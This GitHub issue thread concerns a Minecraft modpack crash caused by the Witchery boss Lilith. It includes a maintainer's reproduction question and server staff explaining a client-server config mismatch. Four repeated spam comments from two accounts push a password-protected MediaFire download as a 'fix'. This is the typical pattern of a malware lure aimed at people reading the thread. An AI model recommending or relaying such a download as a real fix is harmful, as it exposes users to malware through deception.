### ISSUE TITLE
Fighting/Looking at Lilith causes the game to crash

### ISSUE THREAD

**Issue by Flame9954** [xJon/The-1.12.2-Pack#975]
### Was this bug reported before?

- [X] No, it was not.

### Please provide a link to your crash report or latest.log, if relevant

https://mclo.gs/GZbsM0L

### If you have any, please provide a list of additional mods

Witchery: Resurrected and RenderLib

### Please describe the issue you are experiencing

During the Vampire questline, you summon Lilith in the nether. On the HaxysHideout server I summoned her and would be kicked from the server saying it ran into a problem and crashed. Sometimes I would crash by just looking at her other times I could hit her a few times and then crash. Had another person on the server test it as well and they crashed as well just looking at it. Thats about it.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by xJon** [comment]
Can you reproduce this crash outside the server, e.g. in a creative singleplayer world?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Satvn** [comment]
Heya, Staff from haxys here, This is an issue from mismatched config's with the server and your client, The developer of witchery tried to resolve this issue on their end but we came to the conclusion it was an issue with config differences (https://github.com/michelegargiulo/Witchery-Companion/issues/11) , we list our config file for witchery here https://haxyshideout.co.uk/1122/faq/changelog to allow you to match and avoid this issue
